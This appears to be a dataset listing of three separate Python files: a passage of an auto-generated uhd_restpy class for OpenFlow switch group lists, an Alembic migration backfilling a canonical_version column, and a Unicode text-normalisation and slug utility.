        super(SwitchGroupsList, self).__init__(parent, list_op)
    @property
    def Active(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Checked or Unchecked based on the Group Type selections in Groups tab under OF Switch tab-page.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Active']))
    @property
    def ApplyGroup(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Apply Group.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ApplyGroup']))
    @property
    def CopyTtlIn(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Copy TTL inwards from outermost to next-to-outermost.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['CopyTtlIn']))
    @property
    def CopyTtlOut(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Copy TTL outwards from next-to-outermost to outermost.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['CopyTtlOut']))
    @property
    def Count(self):
        # type: () -> int
        """
        Returns
        -------
        - number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
        """
        return self._get_attribute(self._SDM_ATT_MAP['Count'])
    @property
    def DecrementMplsTtl(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Decrement MPLS TTL.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DecrementMplsTtl']))
    @property
    def DecrementNetwork(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Decrement IP TTL.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DecrementNetwork']))
    @property
    def DescriptiveName(self):
        # type: () -> str
        """
        Returns
        -------
        - str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
        """
        return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
    @property
    def GroupType(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Can be of the following types per switch: 1)All: Execute all buckets in the group. 2)Select:Execute one bucket in the group. 3)Indirect:Execute the one defined bucket in this group. 4)Fast Failover:Execute the first live bucket.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GroupType']))
    @property
    def MaxNumberOfGroups(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Maximum number of groups for each group type.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MaxNumberOfGroups']))
    @property
    def Name(self):
        # type: () -> str
        """
        Returns
        -------
        - str: Name of NGPF element, guaranteed to be unique in Scenario
        """
        return self._get_attribute(self._SDM_ATT_MAP['Name'])
    @Name.setter
    def Name(self, value):
        # type: (str) -> None
        self._set_attribute(self._SDM_ATT_MAP['Name'], value)
    @property
    def Output(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Output to switch port.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Output']))
    @property
    def ParentSwitch(self):
        # type: () -> str
        """
        Returns
        -------
        - str: Parent Switch Name.
        """
        return self._get_attribute(self._SDM_ATT_MAP['ParentSwitch'])
    @property
    def PopMpls(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Pop the outer MPLS tag.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PopMpls']))
    @property
    def PopPbb(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Pop the outer PBB service tag (I-TAG).
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PopPbb']))
    @property
    def PopVlan(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Pop the outer VLAN tag.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PopVlan']))
    @property
    def PushMpls(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Push a new MPLS tag.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PushMpls']))
    @property
    def PushPbb(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Push a new PBB service tag (I-TAG).
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PushPbb']))
    @property
    def PushVlan(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Push a new VLAN tag.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PushVlan']))
    @property
    def SetField(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Set a header field using OXM TLV format.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SetField']))
    @property
    def SetMplsTtl(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Set MPLS TTL.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SetMplsTtl']))
    @property
    def SetNetwork(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Set IP TTL.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SetNetwork']))
    @property
    def SetQueue(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(uhd_restpy.multivalue.Multivalue): Group Action:Set queue id when outputting to a port.
        """
        from uhd_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SetQueue']))
    def update(self, Name=None):
        # type: (str) -> SwitchGroupsList
        """Updates switchGroupsList resource on the server.
        This method has some named parameters with a type: obj (Multivalue).
        The Multivalue class has documentation that details the possible values for those named parameters.
        Args
        ----
        - Name (str): Name of NGPF element, guaranteed to be unique in Scenario
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
    def add(self, Name=None):
        # type: (str) -> SwitchGroupsList
        """Adds a new switchGroupsList resource on the json, only valid with config assistant
        Args
        ----
        - Name (str): Name of NGPF element, guaranteed to be unique in Scenario
        Returns
        -------
        - self: This instance with all currently retrieved switchGroupsList resources using find and the newly added switchGroupsList resources available through an iterator or index
        Raises
        ------
        - Exception: if this function is not being used with config assistance
        """
        return self._add_xpath(self._map_locals(self._SDM_ATT_MAP, locals()))
    def find(self, Count=None, DescriptiveName=None, Name=None, ParentSwitch=None):
        # type: (int, str, str, str) -> SwitchGroupsList
        """Finds and retrieves switchGroupsList resources from the server.
        All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve switchGroupsList resources from the server.
        To retrieve an exact match ensure the parameter value starts with ^ and ends with $
        By default the find method takes no parameters and will retrieve all switchGroupsList resources from the server.
        Args
        ----
        - Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
        - DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
        - Name (str): Name of NGPF element, guaranteed to be unique in Scenario
        - ParentSwitch (str): Parent Switch Name.
        Returns
        -------
        - self: This instance with matching switchGroupsList resources retrieved from the server available through an iterator or index
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
    def read(self, href):
        """Retrieves a single instance of switchGroupsList data from the server.
        Args
        ----
        - href (str): An href to the instance to be retrieved
        Returns
        -------
        - self: This instance with the switchGroupsList resources from the server available through an iterator or index
        Raises
        ------
        - NotFoundError: The requested resource does not exist on the server
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._read(href)
    def get_device_ids(self, PortNames=None, Active=None, ApplyGroup=None, CopyTtlIn=None, CopyTtlOut=None, DecrementMplsTtl=None, DecrementNetwork=None, GroupType=None, MaxNumberOfGroups=None, Output=None, PopMpls=None, PopPbb=None, PopVlan=None, PushMpls=None, PushPbb=None, PushVlan=None, SetField=None, SetMplsTtl=None, SetNetwork=None, SetQueue=None):
        """Base class infrastructure that gets a list of switchGroupsList device ids encapsulated by this object.
        Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
        Args
        ----
        - PortNames (str): optional regex of port names
        - Active (str): optional regex of active
        - ApplyGroup (str): optional regex of applyGroup
        - CopyTtlIn (str): optional regex of copyTtlIn
        - CopyTtlOut (str): optional regex of copyTtlOut
        - DecrementMplsTtl (str): optional regex of decrementMplsTtl
        - DecrementNetwork (str): optional regex of decrementNetwork
        - GroupType (str): optional regex of groupType
        - MaxNumberOfGroups (str): optional regex of maxNumberOfGroups
        - Output (str): optional regex of output
        - PopMpls (str): optional regex of popMpls
        - PopPbb (str): optional regex of popPbb
        - PopVlan (str): optional regex of popVlan
        - PushMpls (str): optional regex of pushMpls
        - PushPbb (str): optional regex of pushPbb
        - PushVlan (str): optional regex of pushVlan
        - SetField (str): optional regex of setField
        - SetMplsTtl (str): optional regex of setMplsTtl
        - SetNetwork (str): optional regex of setNetwork
        - SetQueue (str): optional regex of setQueue
        Returns
        -------
        - list(int): A list of device ids that meets the regex criteria provided in the method parameters
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._get_ngpf_device_ids(locals())
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Data migration for canonical_version column
Revision ID: 1fdf5dc6bbf3
Revises: f7577b6938c1
Create Date: 2018-02-28 22:40:42.495355
"""
import sqlalchemy as sa
from alembic import op
from packaging.utils import canonicalize_version
# Alembic revision identifiers.
revision = "1fdf5dc6bbf3"
down_revision = "f7577b6938c1"

# Lightweight table stub for this data migration: only the columns touched
# here are declared, not the full `releases` schema.
releases = sa.Table(
    "releases",
    sa.MetaData(),
    sa.Column("version", sa.Text(), primary_key=True),
    sa.Column("canonical_version", sa.Text()),
)
def upgrade():
    """Backfill releases.canonical_version, then make the column NOT NULL."""
    connection = op.get_bind()
    # One UPDATE per distinct version string; rows that already have a
    # canonical_version are skipped by the IS NULL guard in the WHERE clause.
    version_query = sa.select([releases.c.version]).distinct()
    for release in connection.execute(version_query):
        connection.execute(
            releases.update()
            .where(
                sa.and_(
                    releases.c.version == release.version,
                    releases.c.canonical_version.is_(None),
                )
            )
            .values(canonical_version=canonicalize_version(release.version))
        )
    op.alter_column("releases", "canonical_version", nullable=False)
def downgrade():
    """Irreversible: the original (non-canonical) form cannot be recovered."""
    raise RuntimeError("No such thing as decanonicalization!")
|
"""
Taken from the Helmut project.
https://github.com/okfn/helmut/blob/master/helmut/text.py
"""
from unicodedata import normalize as ucnorm, category
def normalize(text):
    """ Simplify a piece of text to generate a more canonical
    representation. This involves lowercasing, stripping trailing
    spaces, removing symbols, diacritical marks (umlauts) and
    converting all newlines etc. to single spaces.

    Fixes over the previous version:
    - Hyphens are replaced with spaces BEFORE whitespace collapsing, so
      e.g. "a - b" now yields "a b" instead of "a  b" (the old code
      replaced hyphens after collapsing and could leave double spaces).
    - The quadratic `while '  ' in text` loop is replaced with a single
      split/join pass (which also strips leading/trailing spaces).
    """
    if not isinstance(text, str):
        text = str(text)
    text = text.lower()
    decomposed = ucnorm('NFKD', text)
    filtered = []
    for char in decomposed:
        cat = category(char)
        if cat.startswith('C') or cat.startswith('Z'):
            # control chars, newlines, non-breaking spaces -> plain space
            filtered.append(' ')
        elif cat.startswith('M') or cat.startswith('S'):
            # marks (umlauts) and symbols (currency) are dropped
            continue
        else:
            filtered.append(char)
    text = u''.join(filtered)
    # remove hyphens (before collapsing, so no double spaces remain)
    text = text.replace('-', ' ')
    # collapse runs of spaces and strip the ends
    text = ' '.join(text.split())
    return ucnorm('NFKC', text)
def url_slug(text):
    """Normalise *text* and convert it into a URL-friendly slug:
    spaces become hyphens, dots become underscores."""
    slug = normalize(text)
    slug = slug.replace(' ', '-')
    slug = slug.replace('.', '_')
    return slug
def tokenize(text, splits='COPZ'):
    """Yield maximal runs of characters from *text*, splitting on any
    character whose Unicode category starts with one of *splits*
    (default: Control, Other(?), Punctuation, Separator initials)."""
    buf = []
    for ch in str(text):
        if category(ch)[0] in splits:
            # Separator character: flush any pending token.
            if buf:
                yield u''.join(buf)
                buf = []
        else:
            buf.append(ch)
    if buf:
        yield u''.join(buf)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.